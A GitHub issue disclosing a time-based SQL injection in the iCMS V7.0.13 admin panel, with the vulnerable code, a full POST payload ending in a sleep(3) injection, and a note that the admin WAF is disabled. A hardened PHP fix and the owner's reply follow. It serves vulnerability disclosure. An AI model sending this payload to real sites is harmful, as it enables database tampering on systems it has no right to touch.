
iCMS V7.0.13 Has A SQLi vulnerability in article.admincp.php #47

Closed
awindog opened this issue Jan 10, 2019 · 1 comment

Comments

@awindog

commented Jan 10, 2019

The vulnerability is in the background (admincp).
In line 898, in this code, we can control $_data_id:

    // article.admincp.php, line 898: the posted JSON is unescaped and decoded as-is
    if($_POST['_data_id']){
        $_data_id = stripslashes($_POST['_data_id']);
        $_data_id = json_decode($_data_id,true);
        $_count   = count($_data_id);
    }

We can post data, and due to stripslashes() we can also post a ' successfully.
In line 930:

        // article.admincp.php, line 930: every decoded value is passed straight to del_data()
        if(is_array($_data_id)){
            $dkey = array_search($adid, $_data_id);
            if($dkey!==false && $_chapter){// when revoking a chapter
                unset($_data_id[$dkey]);
                // delete the chapters
                if($_data_id)foreach ($_data_id as $_id) {
                    $_id && article::del_data($_id,'id');
                }
            }
        }

If $_data_id is an array, $dkey!==false, and $_chapter has a value, we can send $_id to article::del_data($_id,'id').

In article.class.php:

    // article.class.php: $id is interpolated directly into the DELETE statement
    public static function del_data($id,$f='aid'){
        iDB::query("DELETE FROM `#iCMS@__article_data` WHERE `$f`='$id'");
    }

And the public function article_data() is used in public function do_save() in line 751: $url OR $this->article_data($body,$aid,$haspic,$_chapter);
We can find that $dkey = array_search($adid, $_data_id); we don't know $adid, but we can post many values to bypass this, like "1":"1","2":"2"......"1000":"1000".
And for $_chapter, $_chapter = (int)$_POST['chapter']; so we can send chapter=1 to bypass.
So the final payload is:
_cid=&_scid=&_tags=&_pid=&_data_id=&article_id=0&userid=1&ucid=&postype=1&REFERER=http%3A%2F%2Flocalhost%2FiCMSv7013%2Fadmincp.php%3Fapp%3Darticle%26do%3Dtrash&chapter=1&markdown=0&cid=1&status=1&scid%5B%5D=1&pid%5B%5D=0&title=aaaaa&stitle=aa&source=&author=&editor=iCMS&pic=&mpic=&spic=&keywords=&tags=a&description=a&data_id=&subtitle=&autopic=1&body%5B%5D=%3Cp%3Eaaaaaaaaaaaaa%3Cbr%2F%3E%3C%2Fp%3E&pubdate=2019-01-05+14%3A04%3A14&sortnum=1546668254&weight=1546668254&hits=0&hits_today=0&hits_yday=0&hits_week=0&hits_month=0&favorite=0&comments=0&good=0&bad=0&tpl=&clink=&url=&_data_id={"1":"1","2":"2"......"1000":"1000","1001":"1' and sleep (3)%23"}

And another very very very very very important problem is that in admincp.php there is define('iPHP_WAF_POST',false); but in IWAF.class.php you use defined('iPHP_WAF_POST') OR define('iPHP_WAF_POST',true);, and at this place defined('iPHP_WAF_POST') of course returns true, which means this WAF in the background is of no use at all!!!!!!!!!!!! So I can use sleep(3) and continue injecting.

Author: leo.ye@dbappsecurity.com.cn
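The fix a maintainer would want for the two code paths quoted above is to stop attacker-controlled text from ever reaching the query: validate each decoded `_data_id` entry as a positive integer, whitelist the column name passed as `$f`, and bind the id through a prepared statement. The block below is an added example written for this report, not iCMS project code; it assumes a PDO connection (an in-memory SQLite database constructed for the demo) in place of the project's `iDB` wrapper and uses a placeholder table name instead of `#iCMS@__article_data`.

```php
<?php
// Added example (not iCMS code): hardened counterparts to the _data_id
// handling and del_data() quoted in the report. Uses PDO + SQLite in memory
// so it runs offline; iCMS itself goes through iDB::query().
declare(strict_types=1);

const ARTICLE_DATA_TABLE = 'icms_article_data'; // placeholder for `#iCMS@__article_data`

/**
 * Decode the JSON posted as _data_id and keep only positive integers.
 * Strings carrying quotes, nested arrays, floats, etc. are dropped, so no
 * attacker-controlled text is ever interpolated into SQL.
 */
function parse_data_ids(string $raw): array
{
    $decoded = json_decode($raw, true);
    if (!is_array($decoded)) {
        return [];
    }
    $ids = [];
    foreach ($decoded as $value) {
        if (is_int($value) && $value > 0) {
            $ids[] = $value;
        } elseif (is_string($value) && ctype_digit($value) && (int)$value > 0) {
            $ids[] = (int)$value;
        }
        // anything else (e.g. "1' and sleep (3)#") is silently discarded
    }
    return array_values(array_unique($ids));
}

/**
 * Hardened del_data(): identifiers cannot be bound as parameters, so the
 * column name is checked against a whitelist; the id is bound as an integer
 * through a prepared statement instead of being spliced into the string.
 */
function del_data(PDO $db, int $id, string $f = 'aid'): int
{
    $allowed = ['aid', 'id'];
    if (!in_array($f, $allowed, true)) {
        throw new InvalidArgumentException("unexpected column: $f");
    }
    $stmt = $db->prepare('DELETE FROM ' . ARTICLE_DATA_TABLE . " WHERE `$f` = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// --- demo on constructed data ---
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ' . ARTICLE_DATA_TABLE . ' (id INTEGER PRIMARY KEY, aid INTEGER, body TEXT)');
$db->exec('INSERT INTO ' . ARTICLE_DATA_TABLE .
          " VALUES (1, 10, 'chapter one'), (2, 10, 'chapter two'), (3, 11, 'other')");

// Constructed request body shaped like the one in the report: numeric ids
// plus one entry carrying a quote and a time-based payload.
$posted = '{"1":"1","2":"2","3":"1\' and sleep (3)#"}';
$ids = parse_data_ids($posted);      // [1, 2]; the third entry is rejected
foreach ($ids as $id) {
    del_data($db, $id, 'id');
}
$remaining = (int)$db->query('SELECT COUNT(*) FROM ' . ARTICLE_DATA_TABLE)->fetchColumn();
echo "remaining rows: $remaining\n";  // only the row with id 3 is left
```

Casting in `parse_data_ids()` is what makes the `stripslashes()` call harmless: once the values are integers, the quote an attacker can smuggle through has nowhere to go. The whitelist on `$f` matters too, because the column name is the one part of the statement a prepared statement cannot protect.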

@idreamsoft


Owner

commented Jan 10, 2019

Thank you, we will fix it as soon as possible.
